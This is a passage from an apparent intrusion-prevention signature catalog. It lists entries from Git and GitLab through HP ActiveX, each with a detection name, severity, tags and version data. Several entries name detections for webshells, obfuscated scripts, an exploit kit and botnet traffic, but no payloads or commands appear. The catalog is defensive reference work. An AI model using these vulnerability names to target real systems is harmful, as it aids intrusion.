Vulnerability: Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write
Description:
Back to top

File-Text_Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service
Description:
Back to top

File-Text_Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1541-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution
Description:
Back to top

File-Text_Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service
Description:
Back to top

File-Text_Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1768-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service
Description:
Back to top

File-Text_Gitlab-Project-Import-Command-Injection

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Gitlab-Project-Import-Command-Injection
Description:
Back to top

File-Text_GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module

About this situation: An attempt to exploit a vulnerability in a GL.iNet device detected.
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, GL.iNet, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module
Description:
Back to top

File-Text_Glasstoken-WebShell

About this situation: Glasstoken webshell was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Glasstoken-WebShell
Description:
Back to top

File-Text_Globals-PHP-Obfuscator-Code

About this situation: Obfuscated PHP detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: Free-Online-PHP-Obfuscator-Code
Description:
Back to top

File-Text_GLPI-Computervirtualmachine-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: GLPI-Computervirtualmachine-SQL-Injection
Description:
Back to top

File-Text_GLPI-Inventory-Agent-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Vulnerability: GLPI-Inventory-Agent-SQL-Injection
Description:
Back to top

File-Text_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727

About this situation: An attempt to exploit a vulnerability in GLPI detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Vulnerability: GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
Description:
Back to top

File-Text_Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Libxslt Libxslt detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libxslt, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
Description:
Back to top

File-Text_GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GOM Player ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Gretech Online Movie Player, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
Description:
Back to top

File-Text_Google-Android-Browser-Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Google Android Browser detected
Context: Text File Stream
Severity: 7
Tags: Android, Any Hardware, Google Android Browser, CVE2014, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Google-Android-Browser-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Google-Apps-Mailto-URI

About this situation: An attempt to exploit a vulnerability in Google Apps detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Google Apps, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1734-5242
Vulnerability: Google-Apps-Mailto-URI-Argument-Injection
Description:
Back to top

File-Text_Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free
Description:
Back to top

File-Text_Google-Chrome-Blink-Imagebitmap-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Blink-Imagebitmap-Integer-Overflow
Description:
Back to top

File-Text_Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Chrome, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786
Description:
Back to top

File-Text_Google-Chrome-GURL-Cross-Origin-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, CVE2010, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Google-Chrome-GURL-Cross-Origin-Bypass
Description:
Back to top

File-Text_Google-Chrome-Insufficient-Validation-CVE-2021-21220

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Google-Chrome-Insufficient-Validation-CVE-2021-21220
Description:
Back to top

File-Text_Google-Chrome-Locationattributesetter-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Locationattributesetter-Use-After-Free
Description:
Back to top

File-Text_Google-Chrome-Multiple-File-Type-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Multiple-File-Type-Security-Bypass
Description:
Back to top

File-Text_Google-Chrome-Notifyinstancewasdeleted-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Notifyinstancewasdeleted-Use-After-Free
Description:
Back to top

File-Text_Google-Chrome-Object-Lifecycle-Issue

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Google-Chrome-Object-Lifecycle-Issue
Description:
Back to top

File-Text_Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2020-6418

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2020-6418
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2021-21224

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2021-21224
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2021-30563

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2021-30563
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2022-1096

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2022-1096
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2022-4262

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2022-4262
Description:
Back to top

File-Text_Google-Chrome-Type-Confusion-CVE-2023-2033

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Google-Chrome-Type-Confusion-CVE-2023-2033
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2019-13720

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2019-13720
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2019-5869

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1205-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2019-5869
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2020-6378

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2020-6378
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2021-37975

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2021-37975
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2022-3038

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2022-3038
Description:
Back to top

File-Text_Google-Chrome-Use-After-Free-CVE-2023-6112

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Microsoft Edge, Chromium, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Google-Chrome-Use-After-Free-CVE-2023-6112
Description:
Back to top

File-Text_Google-Chrome-V8-Crankshaft-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Google-Chrome-V8-Crankshaft-Type-Confusion
Description:
Back to top

File-Text_Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Google V8 Javascript Engine detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Vulnerability: Google-Chrome-V8-Engine-Jsstackcheck-Type-Confusion
Description:
Back to top

File-Text_Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040

About this situation: An attempt to exploit a vulnerability in the component V8 of Google Chrome
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Google-Chrome-V8-Remote-Code-Execution-CVE-2020-16040
Description:
Back to top

File-Text_Google-Chrome-V8-Type-Confusion-CVE-2021-30551

About this situation: An attempt to exploit a vulnerability in Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Google-Chrome-V8-Type-Confusion-CVE-2021-30551
Description:
Back to top

File-Text_Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-WebGL-2-Readpixels-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Xssauditor-Filter-Security-Policy-Bypass
Description:
Back to top

File-Text_Google-Golang-Get-Command-Injection

About this situation: An attempt to exploit a vulnerability in Google Golang detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Google Golang, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: Google-Golang-Get-Command-Injection
Description:
Back to top

File-Text_Google-Golang-Get-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Google Golang detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Google Golang, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Google-Golang-Get-Remote-Command-Execution
Description:
Back to top

File-Text_Google-Search-Appliance-Command-Execution

About this situation: An attempt to exploit a Google Search Appliance Command Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Google Search Appliance, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Google-Search-Appliance-Command-Execution
Description:
Back to top

File-Text_Grafana-Labs-Grafana-Geomap-Attribution-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Grafana Labs detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1567-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Grafana-Labs-Geomap-Attribution-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_GrandSoft-EK-Exploit-Redirect-Page

About this situation: GrandSoft Exploit Kit traffic was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: GrandSoft-EK-Exploit-Redirect-Page
Description:
Back to top

File-Text_Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Green Dam Youth Escort detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Green Dam Youth Escort, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
Description:
Back to top

File-Text_GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Any Software, MS2024-10, CVE2024, Windows not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Vulnerability: GrimResource-Remote-Code-Execution-Via-Windows-MSC-Files-CVE-2024-43572
Description:
Back to top

File-Text_Gumblar-Bot-Traffic

About this situation: Gumblar bot traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Gumblar-Bot
Description:
Back to top

File-Text_Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Haihaisoft Universal Player detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS, Android, Any Hardware, Haihaisoft, CVE2009, Windows not specific, Mac OS not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Harbor-Project-Harbor-User-API-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Harbor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Harbor, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: Harbor-Project-Harbor-User-API-Privilege-Escalation
Description:
Back to top

File-Text_Hex-Encoded-Script-Data-Content

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-Text_Hex-Encoded-String-In-Script-File

About this situation: Detected hex encoded string in script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-821-5242
Last changed: sgpkg-ips-821-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Hexojs-Hexo-Includecodetag-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Hexojs Hexo detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Hexo, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Hexojs-Hexo-Includecodetag-Path-Traversal
Description:
Back to top

File-Text_Hex_Encoded_Url_Detected

About this situation: Hex encoded url detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Hikvision-Command-Injection-CVE-2021-36260

About this situation: An attempt to exploit a vulnerability in Hikvision detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Hikvision, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Hikvision-Command-Injection-CVE-2021-36260
Description:
Back to top

File-Text_Honeywell-ActiveX-Control-Code-Execution

About this situation: Honeywell ActiveX control code execution.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Honeywell RemoteDeploy, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Honeywell-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Honeywell ComfortPoint Open Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Honeywell ComfortPoint Open Manager, Honeywell Enterprise Buildings Integrator, Honeywell SymmetrE, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-816-5242
Vulnerability: Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Honeywell OPOS Suite detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Honeywell OPOS Suite, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Honeywell OPOS Suite detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Honeywell OPOS Suite, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow
Description:
Back to top

File-Text_HP-App-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in HP Lifecycle Management ActiveX detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Lifecycle Management ActiveX, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: HP-Application-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure

About this situation: An attempt to exploit a vulnerability in HP Lifecycle Management ActiveX detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Lifecycle Management ActiveX, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
